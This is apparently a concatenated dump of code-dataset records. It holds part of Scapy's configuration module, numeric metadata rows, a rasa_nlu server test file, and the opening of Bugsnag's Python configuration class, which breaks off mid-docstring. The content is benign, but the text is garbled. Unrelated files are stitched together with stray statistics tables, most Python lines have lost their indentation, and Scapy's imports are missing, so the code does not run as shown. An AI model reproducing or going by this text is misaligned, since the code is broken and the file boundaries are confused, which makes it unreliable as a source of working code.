from scapy.error import log_scapy, warning, ScapyInvalidPlatformException
from scapy.modules import six
from scapy.themes import NoTheme, apply_ipython_style
############
# Config #
############
class ConfClass(object):
def configure(self, cnf):
self.__dict__ = cnf.__dict__.copy()
def __repr__(self):
return str(self)
def __str__(self):
s = ""
keys = self.__class__.__dict__.copy()
keys.update(self.__dict__)
keys = sorted(keys)
for i in keys:
if i[0] != "_":
r = repr(getattr(self, i))
r = " ".join(r.split())
wlen = 76 - max(len(i), 10)
if len(r) > wlen:
r = r[:wlen - 3] + "..."
s += "%-10s = %s\n" % (i, r)
return s[:-1]
class Interceptor(object):
def __init__(self, name=None, default=None,
hook=None, args=None, kargs=None):
self.name = name
self.intname = "_intercepted_%s" % name
self.default = default
self.hook = hook
self.args = args if args is not None else []
self.kargs = kargs if kargs is not None else {}
def __get__(self, obj, typ=None):
if not hasattr(obj, self.intname):
setattr(obj, self.intname, self.default)
return getattr(obj, self.intname)
@staticmethod
def set_from_hook(obj, name, val):
int_name = "_intercepted_%s" % name
setattr(obj, int_name, val)
def __set__(self, obj, val):
setattr(obj, self.intname, val)
self.hook(self.name, val, *self.args, **self.kargs)
def _readonly(name):
default = Conf.__dict__[name].default
Interceptor.set_from_hook(conf, name, default)
raise ValueError("Read-only value !")
ReadOnlyAttribute = functools.partial(
Interceptor,
hook=(lambda name, *args, **kwargs: _readonly(name))
)
ReadOnlyAttribute.__doc__ = "Read-only class attribute"
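# A tiny sketch of the Interceptor descriptor above: assigning to the
# attribute fires the hook with (name, value); the _Demo class is hypothetical.
class _Demo(object):
    speed = Interceptor("speed", 0, lambda name, val: print(name, "->", val))
# _Demo().speed = 5   # would print: speed -> 5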
class ProgPath(ConfClass):
universal_open = "open" if DARWIN else "xdg-open"
pdfreader = universal_open
psreader = universal_open
svgreader = universal_open
dot = "dot"
display = "display"
tcpdump = "tcpdump"
tcpreplay = "tcpreplay"
hexedit = "hexer"
tshark = "tshark"
wireshark = "wireshark"
ifconfig = "ifconfig"
class ConfigFieldList:
def __init__(self):
self.fields = set()
self.layers = set()
@staticmethod
def _is_field(f):
return hasattr(f, "owners")
def _recalc_layer_list(self):
self.layers = {owner for f in self.fields for owner in f.owners}
def add(self, *flds):
self.fields |= {f for f in flds if self._is_field(f)}
self._recalc_layer_list()
def remove(self, *flds):
self.fields -= set(flds)
self._recalc_layer_list()
def __contains__(self, elt):
if isinstance(elt, base_classes.Packet_metaclass):
return elt in self.layers
return elt in self.fields
def __repr__(self):
return "<%s [%s]>" % (self.__class__.__name__, " ".join(str(x) for x in self.fields)) # noqa: E501
class Emphasize(ConfigFieldList):
pass
class Resolve(ConfigFieldList):
pass
class Num2Layer:
def __init__(self):
self.num2layer = {}
self.layer2num = {}
def register(self, num, layer):
self.register_num2layer(num, layer)
self.register_layer2num(num, layer)
def register_num2layer(self, num, layer):
self.num2layer[num] = layer
def register_layer2num(self, num, layer):
self.layer2num[layer] = num
def __getitem__(self, item):
if isinstance(item, base_classes.Packet_metaclass):
return self.layer2num[item]
return self.num2layer[item]
def __contains__(self, item):
if isinstance(item, base_classes.Packet_metaclass):
return item in self.layer2num
return item in self.num2layer
def get(self, item, default=None):
return self[item] if item in self else default
def __repr__(self):
lst = []
for num, layer in six.iteritems(self.num2layer):
if layer in self.layer2num and self.layer2num[layer] == num:
dir = "<->"
else:
dir = " ->"
lst.append((num, "%#6x %s %-20s (%s)" % (num, dir, layer.__name__,
layer._name)))
for layer, num in six.iteritems(self.layer2num):
if num not in self.num2layer or self.num2layer[num] != layer:
lst.append((num, "%#6x <- %-20s (%s)" % (num, layer.__name__,
layer._name)))
lst.sort()
return "\n".join(y for x, y in lst)
class LayersList(list):
def __init__(self):
list.__init__(self)
self.ldict = {}
def __repr__(self):
return "\n".join("%-20s: %s" % (l.__name__, l.name) for l in self)
def register(self, layer):
self.append(layer)
if layer.__module__ not in self.ldict:
self.ldict[layer.__module__] = []
self.ldict[layer.__module__].append(layer)
def layers(self):
result = []
# This import may feel useless, but it is required for the eval below
import scapy # noqa: F401
for lay in self.ldict:
doc = eval(lay).__doc__
result.append((lay, doc.strip().split("\n")[0] if doc else lay))
return result
class CommandsList(list):
def __repr__(self):
s = []
for l in sorted(self, key=lambda x: x.__name__):
doc = l.__doc__.split("\n")[0] if l.__doc__ else "--"
s.append("%-20s: %s" % (l.__name__, doc))
return "\n".join(s)
def register(self, cmd):
self.append(cmd)
return cmd # return cmd so that method can be used as a decorator
def lsc():
"""Displays Scapy's default commands"""
print(repr(conf.commands))
class CacheInstance(dict, object):
__slots__ = ["timeout", "name", "_timetable", "__dict__"]
def __init__(self, name="noname", timeout=None):
self.timeout = timeout
self.name = name
self._timetable = {}
def flush(self):
self.__init__(name=self.name, timeout=self.timeout)
def __getitem__(self, item):
if item in self.__slots__:
return object.__getattribute__(self, item)
val = dict.__getitem__(self, item)
if self.timeout is not None:
t = self._timetable[item]
if time.time() - t > self.timeout:
raise KeyError(item)
return val
def get(self, item, default=None):
# overloading this method is needed to force the dict to go through
# the timetable check
try:
return self[item]
except KeyError:
return default
def __setitem__(self, item, v):
if item in self.__slots__:
return object.__setattr__(self, item, v)
self._timetable[item] = time.time()
dict.__setitem__(self, item, v)
def update(self, other):
for key, value in six.iteritems(other):
# We only update an element from `other` either if it does
# not exist in `self` or if the entry in `self` is older.
if key not in self or self._timetable[key] < other._timetable[key]:
dict.__setitem__(self, key, value)
self._timetable[key] = other._timetable[key]
def iteritems(self):
if self.timeout is None:
return six.iteritems(self.__dict__)
t0 = time.time()
return ((k, v) for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout) # noqa: E501
def iterkeys(self):
if self.timeout is None:
return six.iterkeys(self.__dict__)
t0 = time.time()
return (k for k in six.iterkeys(self.__dict__) if t0 - self._timetable[k] < self.timeout) # noqa: E501
def __iter__(self):
return six.iterkeys(self.__dict__)
def itervalues(self):
if self.timeout is None:
return six.itervalues(self.__dict__)
t0 = time.time()
return (v for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout) # noqa: E501
def items(self):
if self.timeout is None:
return dict.items(self)
t0 = time.time()
return [(k, v) for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout] # noqa: E501
def keys(self):
if self.timeout is None:
return dict.keys(self)
t0 = time.time()
return [k for k in six.iterkeys(self.__dict__) if t0 - self._timetable[k] < self.timeout] # noqa: E501
def values(self):
if self.timeout is None:
return list(six.itervalues(self))
t0 = time.time()
return [v for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout] # noqa: E501
def __len__(self):
if self.timeout is None:
return dict.__len__(self)
return len(self.keys())
def summary(self):
return "%s: %i valid items. Timeout=%rs" % (self.name, len(self), self.timeout) # noqa: E501
def __repr__(self):
s = []
if self:
mk = max(len(k) for k in six.iterkeys(self.__dict__))
fmt = "%%-%is %%s" % (mk + 1)
for item in six.iteritems(self.__dict__):
s.append(fmt % item)
return "\n".join(s)
class NetCache:
def __init__(self):
self._caches_list = []
def add_cache(self, cache):
self._caches_list.append(cache)
setattr(self, cache.name, cache)
def new_cache(self, name, timeout=None):
c = CacheInstance(name=name, timeout=timeout)
self.add_cache(c)
def __delattr__(self, attr):
raise AttributeError("Cannot delete attributes")
def update(self, other):
for co in other._caches_list:
if hasattr(self, co.name):
getattr(self, co.name).update(co)
else:
self.add_cache(co.copy())
def flush(self):
for c in self._caches_list:
c.flush()
def __repr__(self):
return "\n".join(c.summary() for c in self._caches_list)
def _version_checker(module, minver):
"""Checks that module has a higher version that minver.
params:
- module: a module to test
- minver: a tuple of versions
"""
# We could use LooseVersion, but distutils imports imp which is deprecated
version_regexp = r'[a-z]?((?:\d|\.)+\d+)(?:\.dev[0-9]+)?'
version_tags = re.match(version_regexp, module.__version__)
if not version_tags:
return False
version_tags = version_tags.group(1).split(".")
version_tags = tuple(int(x) for x in version_tags)
return version_tags >= minver
def isCryptographyValid():
"""
Check if the cryptography library is present, and if it is recent enough
for most usages in scapy (v1.7 or later).
"""
try:
import cryptography
except ImportError:
return False
return _version_checker(cryptography, (1, 7))
def isCryptographyRecent():
"""
Check if the cryptography library is recent (2.0 and later)
"""
try:
import cryptography
except ImportError:
return False
return _version_checker(cryptography, (2, 0))
def isCryptographyAdvanced():
"""
Check if the cryptography library is present, and if it supports X25519,
ChaCha20Poly1305 and such (v2.0 or later).
"""
try:
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey # noqa: E501
X25519PrivateKey.generate()
except Exception:
return False
else:
return True
def isPyPy():
"""Returns either scapy is running under PyPy or not"""
try:
import __pypy__ # noqa: F401
return True
except ImportError:
return False
def _prompt_changer(attr, val):
"""Change the current prompt theme"""
try:
sys.ps1 = conf.color_theme.prompt(conf.prompt)
except Exception:
pass
try:
apply_ipython_style(get_ipython())
except NameError:
pass
def _set_conf_sockets():
"""Populate the conf.L2Socket and conf.L3Socket
according to the various use_* parameters
"""
from scapy.main import _load
if conf.use_bpf and not BSD:
Interceptor.set_from_hook(conf, "use_bpf", False)
raise ScapyInvalidPlatformException("BSD-like (OSX, *BSD...) only !")
if not conf.use_pcap and SOLARIS:
Interceptor.set_from_hook(conf, "use_pcap", True)
raise ScapyInvalidPlatformException(
"Scapy only supports libpcap on Solaris !"
)
# we are already in an Interceptor hook, use Interceptor.set_from_hook
if conf.use_pcap or conf.use_dnet:
try:
from scapy.arch.pcapdnet import L2pcapListenSocket, L2pcapSocket, \
L3pcapSocket
except (OSError, ImportError):
warning("No libpcap provider available ! pcap won't be used")
Interceptor.set_from_hook(conf, "use_pcap", False)
else:
conf.L3socket = L3pcapSocket
conf.L3socket6 = functools.partial(L3pcapSocket, filter="ip6")
conf.L2socket = L2pcapSocket
conf.L2listen = L2pcapListenSocket
# Update globals
_load("scapy.arch.pcapdnet")
return
if conf.use_bpf:
from scapy.arch.bpf.supersocket import L2bpfListenSocket, \
L2bpfSocket, L3bpfSocket
conf.L3socket = L3bpfSocket
conf.L3socket6 = functools.partial(L3bpfSocket, filter="ip6")
conf.L2socket = L2bpfSocket
conf.L2listen = L2bpfListenSocket
# Update globals
_load("scapy.arch.bpf")
return
if LINUX:
from scapy.arch.linux import L3PacketSocket, L2Socket, L2ListenSocket
conf.L3socket = L3PacketSocket
conf.L3socket6 = functools.partial(L3PacketSocket, filter="ip6")
conf.L2socket = L2Socket
conf.L2listen = L2ListenSocket
# Update globals
_load("scapy.arch.linux")
return
if WINDOWS:
from scapy.arch.windows import _NotAvailableSocket
from scapy.arch.windows.native import L3WinSocket, L3WinSocket6
conf.L3socket = L3WinSocket
conf.L3socket6 = L3WinSocket6
conf.L2socket = _NotAvailableSocket
conf.L2listen = _NotAvailableSocket
# No need to update globals on Windows
return
from scapy.supersocket import L3RawSocket
from scapy.layers.inet6 import L3RawSocket6
conf.L3socket = L3RawSocket
conf.L3socket6 = L3RawSocket6
def _socket_changer(attr, val):
if not isinstance(val, bool):
raise TypeError("This argument should be a boolean")
dependencies = { # Things that will be turned off
"use_pcap": ["use_bpf"],
"use_bpf": ["use_pcap"],
}
restore = {k: getattr(conf, k) for k in dependencies}
del restore[attr] # This is handled directly by _set_conf_sockets
if val: # Only if True
for param in dependencies[attr]:
Interceptor.set_from_hook(conf, param, False)
try:
_set_conf_sockets()
except (ScapyInvalidPlatformException, ImportError) as e:
for key, value in restore.items():
Interceptor.set_from_hook(conf, key, value)
if isinstance(e, ScapyInvalidPlatformException):
raise
def _loglevel_changer(attr, val):
"""Handle a change of conf.logLevel"""
log_scapy.setLevel(val)
class Conf(ConfClass):
"""This object contains the configuration of Scapy.
session : filename where the session will be saved
interactive_shell : can be "ipython", "python" or "auto". Default: Auto
    stealth : if 1, prevents any unwanted packet from going out (ARP, DNS, ...)
checkIPID: if 0, doesn't check that IPID matches between IP sent and ICMP IP citation received # noqa: E501
if 1, checks that they either are equal or byte swapped equals (bug in some IP stacks) # noqa: E501
               if 2, strictly checks that they are equal
checkIPsrc: if 1, checks IP src in IP and ICMP IP citation match (bug in some NAT stacks) # noqa: E501
checkIPinIP: if True, checks that IP-in-IP layers match. If False, do not
check IP layers that encapsulates another IP layer
check_TCPerror_seqack: if 1, also check that TCP seq and ack match the ones in ICMP citation # noqa: E501
    iff : selects the default output interface for srp() and sendp(). default:"eth0"  # noqa: E501
verb : level of verbosity, from 0 (almost mute) to 3 (verbose)
promisc : default mode for listening socket (to get answers if you spoof on a lan) # noqa: E501
sniff_promisc : default mode for sniff()
filter : bpf filter added to every sniffing socket to exclude traffic from analysis # noqa: E501
histfile : history file
padding : includes padding in disassembled packets
except_filter : BPF filter for packets to ignore
debug_match : when 1, store received packet that are not matched into debug.recv # noqa: E501
route : holds the Scapy routing table and provides methods to manipulate it
warning_threshold : how much time between warnings from the same place
ASN1_default_codec: Codec used by default for ASN1 objects
mib : holds MIB direct access dictionary
resolve : holds list of fields for which resolution should be done
noenum : holds list of enum fields for which conversion to string should NOT be done # noqa: E501
AS_resolver: choose the AS resolver class to use
extensions_paths: path or list of paths where extensions are to be looked for
contribs : a dict which can be used by contrib layers to store local configuration # noqa: E501
debug_tls:When 1, print some TLS session secrets when they are computed.
recv_poll_rate: how often to check for new packets. Defaults to 0.05s.
"""
version = ReadOnlyAttribute("version", VERSION)
session = ""
interactive = False
interactive_shell = ""
stealth = "not implemented"
iface = None
iface6 = None
layers = LayersList()
commands = CommandsList()
dot15d4_protocol = None # Used in dot15d4.py
logLevel = Interceptor("logLevel", log_scapy.level, _loglevel_changer)
checkIPID = False
checkIPsrc = True
checkIPaddr = True
checkIPinIP = True
check_TCPerror_seqack = False
verb = 2
prompt = Interceptor("prompt", ">>> ", _prompt_changer)
promisc = True
sniff_promisc = 1
raw_layer = None
raw_summary = False
default_l2 = None
l2types = Num2Layer()
l3types = Num2Layer()
L3socket = None
L3socket6 = None
L2socket = None
L2listen = None
BTsocket = None
USBsocket = None
min_pkt_size = 60
bufsize = 2**16
histfile = os.getenv('SCAPY_HISTFILE',
os.path.join(os.path.expanduser("~"),
".scapy_history"))
padding = 1
except_filter = ""
debug_match = False
debug_tls = False
wepkey = ""
cache_iflist = {}
route = None # Filed by route.py
route6 = None # Filed by route6.py
auto_fragment = True
debug_dissector = False
color_theme = Interceptor("color_theme", NoTheme(), _prompt_changer)
warning_threshold = 5
prog = ProgPath()
resolve = Resolve()
noenum = Resolve()
emph = Emphasize()
use_pypy = ReadOnlyAttribute("use_pypy", isPyPy())
use_pcap = Interceptor(
"use_pcap",
os.getenv("SCAPY_USE_PCAPDNET", "").lower().startswith("y"),
_socket_changer
)
# XXX use_dnet is deprecated
use_dnet = os.getenv("SCAPY_USE_PCAPDNET", "").lower().startswith("y")
use_bpf = Interceptor("use_bpf", False, _socket_changer)
use_npcap = False
ipv6_enabled = socket.has_ipv6
extensions_paths = "."
stats_classic_protocols = []
stats_dot11_protocols = []
temp_files = []
netcache = NetCache()
geoip_city = None
# can, tls, http are not loaded by default
load_layers = ['bluetooth', 'bluetooth4LE', 'dhcp', 'dhcp6', 'dns',
'dot11', 'dot15d4', 'eap', 'gprs', 'hsrp', 'inet',
'inet6', 'ipsec', 'ir', 'isakmp', 'l2', 'l2tp',
'llmnr', 'lltd', 'mgcp', 'mobileip', 'netbios',
'netflow', 'ntp', 'ppi', 'ppp', 'pptp', 'radius', 'rip',
'rtp', 'sctp', 'sixlowpan', 'skinny', 'smb', 'snmp',
'tftp', 'vrrp', 'vxlan', 'x509', 'zigbee']
contribs = dict()
crypto_valid = isCryptographyValid()
crypto_valid_recent = isCryptographyRecent()
crypto_valid_advanced = crypto_valid_recent and isCryptographyAdvanced()
fancy_prompt = True
auto_crop_tables = True
recv_poll_rate = 0.05
def __getattr__(self, attr):
# Those are loaded on runtime to avoid import loops
if attr == "manufdb":
from scapy.data import MANUFDB
return MANUFDB
if attr == "ethertypes":
from scapy.data import ETHER_TYPES
return ETHER_TYPES
if attr == "protocols":
from scapy.data import IP_PROTOS
return IP_PROTOS
if attr == "services_udp":
from scapy.data import UDP_SERVICES
return UDP_SERVICES
if attr == "services_tcp":
from scapy.data import TCP_SERVICES
return TCP_SERVICES
return object.__getattr__(self, attr)
if not Conf.ipv6_enabled:
log_scapy.warning("IPv6 support disabled in Python. Cannot load Scapy IPv6 layers.") # noqa: E501
for m in ["inet6", "dhcp6"]:
if m in Conf.load_layers:
Conf.load_layers.remove(m)
conf = Conf()
def crypto_validator(func):
"""
    This is a decorator to be used for any method relying on the cryptography library.  # noqa: E501
Its behaviour depends on the 'crypto_valid' attribute of the global 'conf'.
"""
def func_in(*args, **kwargs):
if not conf.crypto_valid:
raise ImportError("Cannot execute crypto-related method! "
"Please install python-cryptography v1.7 or later.") # noqa: E501
return func(*args, **kwargs)
return func_in
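# Editor's note: a minimal usage sketch of crypto_validator; the class and
# method names below are hypothetical, not part of scapy.
#
#     class _KeyWrapper:
#         @crypto_validator
#         def derive(self, secret):
#             # body only runs when conf.crypto_valid is True,
#             # i.e. python-cryptography v1.7+ is importable
#             return secret[::-1]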
| 33.584187
| 122
| 0.624161
| 2,856
| 22,938
| 4.82423
| 0.22479
| 0.012774
| 0.006387
| 0.00871
| 0.146973
| 0.119756
| 0.097692
| 0.085426
| 0.06358
| 0.06358
| 0
| 0.017981
| 0.275046
| 22,938
| 682
| 123
| 33.633431
| 0.810572
| 0.187287
| 0
| 0.171717
| 0
| 0
| 0.064815
| 0.002007
| 0
| 0
| 0
| 0
| 0
| 1
| 0.131313
| false
| 0.008081
| 0.074747
| 0.016162
| 0.523232
| 0.00404
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e70f438163ee68472f800dcc1f45bfb446e30f
| 5,797
|
py
|
Python
|
tests/base/test_server.py
|
Prodigy123/rasa_nlu_zh
|
b85717063a493f6b148504ee550a0642c6c379ae
|
[
"Apache-2.0"
] | 4
|
2017-07-20T03:06:29.000Z
|
2021-04-20T03:25:17.000Z
|
tests/base/test_server.py
|
imsakshi/rasa_nlu
|
6dafc37825b99139248fdea9e9745f416734d4dd
|
[
"Apache-2.0"
] | null | null | null |
tests/base/test_server.py
|
imsakshi/rasa_nlu
|
6dafc37825b99139248fdea9e9745f416734d4dd
|
[
"Apache-2.0"
] | 2
|
2017-10-03T00:56:22.000Z
|
2018-08-15T10:41:41.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import tempfile
import pytest
import time
from treq.testing import StubTreq
from rasa_nlu.config import RasaNLUConfig
import json
import io
from tests import utilities
from tests.utilities import ResponseTest
from rasa_nlu.server import RasaNLU
@pytest.fixture(scope="module")
def app(tmpdir_factory):
"""
This fixture makes use of the IResource interface of the Klein application to mock the Rasa HTTP server.
:param tmpdir_factory: pytest fixture for creating temporary directories
:return: StubTreq client wrapping the RasaNLU app resource
"""
_, nlu_log_file = tempfile.mkstemp(suffix="_rasa_nlu_logs.json")
_config = {
'write': nlu_log_file,
'port': -1, # unused in test app
"pipeline": "keyword",
"path": tmpdir_factory.mktemp("projects").strpath,
"server_model_dirs": {},
"data": "./data/demo-restaurants.json",
"emulate": "wit",
"max_training_processes": 1
}
config = RasaNLUConfig(cmdline_args=_config)
rasa = RasaNLU(config, testing=True)
return StubTreq(rasa.app.resource())
@pytest.fixture
def rasa_default_train_data():
with io.open('data/examples/rasa/demo-rasa.json',
encoding='utf-8') as train_file:
return json.loads(train_file.read())
@pytest.inlineCallbacks
def test_root(app):
response = yield app.get("http://dummy_uri/")
content = yield response.text()
assert response.code == 200 and content.startswith("hello")
@pytest.inlineCallbacks
def test_status(app):
response = yield app.get("http://dummy_uri/status")
rjs = yield response.json()
assert response.code == 200 and "available_projects" in rjs
assert "default" in rjs["available_projects"]
@pytest.inlineCallbacks
def test_config(app):
response = yield app.get("http://dummy_uri/config")
assert response.code == 200
@pytest.inlineCallbacks
def test_version(app):
response = yield app.get("http://dummy_uri/version")
rjs = yield response.json()
assert response.code == 200 and "version" in rjs
@pytest.mark.parametrize("response_test", [
ResponseTest(
"http://dummy_uri/parse?q=hello",
[{"entities": {}, "confidence": 1.0, "intent": "greet", "_text": "hello"}]
),
ResponseTest(
"http://dummy_uri/parse?query=hello",
[{"entities": {}, "confidence": 1.0, "intent": "greet", "_text": "hello"}]
),
ResponseTest(
"http://dummy_uri/parse?q=hello ńöñàśçií",
[{"entities": {}, "confidence": 1.0, "intent": "greet", "_text": "hello ńöñàśçií"}]
),
ResponseTest(
"http://dummy_uri/parse?q=",
[{"entities": {}, "confidence": 0.0, "intent": None, "_text": ""}]
),
])
@pytest.inlineCallbacks
def test_get_parse(app, response_test):
response = yield app.get(response_test.endpoint)
rjs = yield response.json()
assert response.code == 200
assert len(rjs) == 1
assert all(prop in rjs[0] for prop in ['entities', 'intent', '_text', 'confidence'])
@pytest.mark.parametrize("response_test", [
ResponseTest(
"http://dummy_uri/parse",
[{"entities": {}, "confidence": 1.0, "intent": "greet", "_text": "hello"}],
payload={"q": "hello"}
),
ResponseTest(
"http://dummy_uri/parse",
[{"entities": {}, "confidence": 1.0, "intent": "greet", "_text": "hello"}],
payload={"query": "hello"}
),
ResponseTest(
"http://dummy_uri/parse",
[{"entities": {}, "confidence": 1.0, "intent": "greet", "_text": "hello ńöñàśçií"}],
payload={"q": "hello ńöñàśçií"}
),
])
@pytest.inlineCallbacks
def test_post_parse(app, response_test):
response = yield app.post(response_test.endpoint, data=json.dumps(response_test.payload),
content_type='application/json')
rjs = yield response.json()
assert response.code == 200
assert len(rjs) == 1
assert all(prop in rjs[0] for prop in ['entities', 'intent', '_text', 'confidence'])
@utilities.slowtest
@pytest.inlineCallbacks
def test_post_train(app, rasa_default_train_data):
response = app.post("http://dummy_uri/train", data=json.dumps(rasa_default_train_data),
content_type='application/json')
time.sleep(3)
app.flush()
response = yield response
rjs = yield response.json()
assert response.code == 404, "A project name to train must be specified"
assert "error" in rjs
@utilities.slowtest
@pytest.inlineCallbacks
def test_post_train_internal_error(app, rasa_default_train_data):
response = app.post("http://dummy_uri/train?project=test",
data=json.dumps({"data": "dummy_data_for_triggering_an_error"}),
content_type='application/json')
time.sleep(3)
app.flush()
response = yield response
rjs = yield response.json()
assert response.code == 500, "The training data format is not valid"
assert "error" in rjs
@pytest.inlineCallbacks
def test_model_hot_reloading(app, rasa_default_train_data):
query = "http://dummy_uri/parse?q=hello&project=my_keyword_model"
response = yield app.get(query)
assert response.code == 404, "Project should not exist yet"
train_u = "http://dummy_uri/train?project=my_keyword_model&pipeline=keyword"
response = app.post(train_u,
data=json.dumps(rasa_default_train_data),
content_type='application/json')
time.sleep(3)
app.flush()
response = yield response
assert response.code == 200, "Training should end successfully"
response = yield app.get(query)
assert response.code == 200, "Project should now exist after it got trained"
| 32.205556
| 104
| 0.656719
| 709
| 5,797
| 5.19464
| 0.234133
| 0.036655
| 0.048873
| 0.068422
| 0.503665
| 0.473799
| 0.459408
| 0.437958
| 0.3489
| 0.309802
| 0
| 0.01256
| 0.203381
| 5,797
| 179
| 105
| 32.385475
| 0.784972
| 0.030533
| 0
| 0.461538
| 0
| 0
| 0.247185
| 0.020912
| 0
| 0
| 0
| 0
| 0.125874
| 1
| 0.076923
| false
| 0
| 0.097902
| 0
| 0.188811
| 0.006993
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e7507528f57c95fde0e247aa2531f1d8579112
| 15,277
|
py
|
Python
|
bugsnag/configuration.py
|
ForroKulcs/bugsnag-python
|
107c1add31a2202cc08ef944aa00ab96996b247a
|
[
"MIT"
] | null | null | null |
bugsnag/configuration.py
|
ForroKulcs/bugsnag-python
|
107c1add31a2202cc08ef944aa00ab96996b247a
|
[
"MIT"
] | null | null | null |
bugsnag/configuration.py
|
ForroKulcs/bugsnag-python
|
107c1add31a2202cc08ef944aa00ab96996b247a
|
[
"MIT"
] | null | null | null |
import os
import platform
import socket
import sysconfig
from typing import List, Any, Tuple, Union
import warnings
from bugsnag.sessiontracker import SessionMiddleware
from bugsnag.middleware import DefaultMiddleware, MiddlewareStack
from bugsnag.utils import (fully_qualified_class_name, validate_str_setter,
validate_bool_setter, validate_iterable_setter,
validate_required_str_setter)
from bugsnag.delivery import (create_default_delivery, DEFAULT_ENDPOINT,
DEFAULT_SESSIONS_ENDPOINT)
from bugsnag.uwsgi import warn_if_running_uwsgi_without_threads
try:
from contextvars import ContextVar
_request_info = ContextVar('bugsnag-request', default=None) # type: ignore
except ImportError:
from bugsnag.utils import ThreadContextVar
_request_info = ThreadContextVar('bugsnag-request', default=None) # type: ignore # noqa: E501
__all__ = ('Configuration', 'RequestConfiguration')
class Configuration:
"""
Global app-level Bugsnag configuration settings.
"""
def __init__(self):
self.api_key = os.environ.get('BUGSNAG_API_KEY', None)
self.release_stage = os.environ.get("BUGSNAG_RELEASE_STAGE",
"production")
self.notify_release_stages = None
self.auto_notify = True
self.send_code = True
self.send_environment = False
self.asynchronous = True
self.delivery = create_default_delivery()
self.lib_root = sysconfig.get_path('purelib')
self.project_root = os.getcwd()
self.app_type = None
self.app_version = None
self.params_filters = ["password", "password_confirmation", "cookie",
"authorization"]
self.ignore_classes = [
"KeyboardInterrupt",
"django.http.Http404",
"django.http.response.Http404",
]
self.endpoint = DEFAULT_ENDPOINT
self.session_endpoint = DEFAULT_SESSIONS_ENDPOINT
self.auto_capture_sessions = True
self.traceback_exclude_modules = []
self.middleware = MiddlewareStack()
self.internal_middleware = MiddlewareStack()
self.internal_middleware.append(DefaultMiddleware)
self.internal_middleware.append(SessionMiddleware)
self.proxy_host = None
if not os.getenv("DYNO"):
self.hostname = socket.gethostname()
else:
self.hostname = None
self.runtime_versions = {"python": platform.python_version()}
def configure(self, api_key=None, app_type=None, app_version=None,
asynchronous=None, auto_notify=None,
auto_capture_sessions=None, delivery=None, endpoint=None,
hostname=None, ignore_classes=None, lib_root=None,
notify_release_stages=None, params_filters=None,
project_root=None, proxy_host=None, release_stage=None,
send_code=None, send_environment=None, session_endpoint=None,
traceback_exclude_modules=None):
"""
Validate and set configuration options. Will warn if an option is of an
incorrect type.
"""
if api_key is not None:
self.api_key = api_key
if app_type is not None:
self.app_type = app_type
if app_version is not None:
self.app_version = app_version
if asynchronous is not None:
self.asynchronous = asynchronous
if auto_notify is not None:
self.auto_notify = auto_notify
if auto_capture_sessions is not None:
self.auto_capture_sessions = auto_capture_sessions
if delivery is not None:
self.delivery = delivery
if endpoint is not None:
self.endpoint = endpoint
if hostname is not None:
self.hostname = hostname
if ignore_classes is not None:
self.ignore_classes = ignore_classes
if lib_root is not None:
self.lib_root = lib_root
if notify_release_stages is not None:
self.notify_release_stages = notify_release_stages
if params_filters is not None:
self.params_filters = params_filters
if project_root is not None:
self.project_root = project_root
if proxy_host is not None:
self.proxy_host = proxy_host
if release_stage is not None:
self.release_stage = release_stage
if send_code is not None:
self.send_code = send_code
if send_environment is not None:
self.send_environment = send_environment
if session_endpoint is not None:
self.session_endpoint = session_endpoint
if traceback_exclude_modules is not None:
self.traceback_exclude_modules = traceback_exclude_modules
return self
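# Editor's note: configure() returns self, so options can be set fluently.
# A minimal sketch (the values below are placeholders):
#
#     config = Configuration().configure(api_key="your-api-key",
#                                        release_stage="staging")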
def get(self, name):
"""
Get a single configuration option
"""
warnings.warn('Using get() to retrieve a Configuration property is ' +
'deprecated in favor of referencing properties directly',
DeprecationWarning)
return getattr(self, name)
@property
def api_key(self):
"""
Unique application identifier
"""
return self._api_key
@api_key.setter # type: ignore
@validate_required_str_setter
def api_key(self, value: str):
self._api_key = value
@property
def app_type(self):
"""
Category for the current application or task
"""
return self._app_type
@app_type.setter # type: ignore
@validate_str_setter
def app_type(self, value: str):
self._app_type = value
@property
def app_version(self):
"""
Release version of the current application
"""
return self._app_version
@app_version.setter # type: ignore
@validate_str_setter
def app_version(self, value: str):
self._app_version = value
@property
def asynchronous(self):
"""
If API requests should be sent asynchronously
"""
return self._asynchronous
@asynchronous.setter # type: ignore
@validate_bool_setter
def asynchronous(self, value: bool):
self._asynchronous = value
if value:
warn_if_running_uwsgi_without_threads()
@property
def auto_capture_sessions(self):
"""
If sessions should be automatically detected and delivered from web
request integrations
"""
return self._auto_capture_sessions
@auto_capture_sessions.setter # type: ignore
@validate_bool_setter
def auto_capture_sessions(self, value: bool):
self._auto_capture_sessions = value
@property
def auto_notify(self):
"""
If uncaught exceptions should be automatically captured and reported
"""
return self._auto_notify
@auto_notify.setter # type: ignore
@validate_bool_setter
def auto_notify(self, value: bool):
self._auto_notify = value
@property
def delivery(self):
"""
Transport mechanism used to make API requests. Implement the Delivery
interface to customize how requests are sent.
"""
return self._delivery
@delivery.setter # type: ignore
def delivery(self, value):
if hasattr(value, 'deliver') and callable(value.deliver):
self._delivery = value
else:
message = ('delivery should implement Delivery interface, got ' +
'{0}. This will be an error in a future release.')
warnings.warn(message.format(type(value).__name__), RuntimeWarning)
@property
def endpoint(self):
"""
Event API endpoint. Set this property if using Bugsnag On-Premise.
>>> config = Configuration()
>>> config.endpoint = 'https://notify.bugsnag.example.co'
"""
return self._endpoint
@endpoint.setter # type: ignore
@validate_required_str_setter
def endpoint(self, value: str):
self._endpoint = value
@property
def hostname(self):
"""
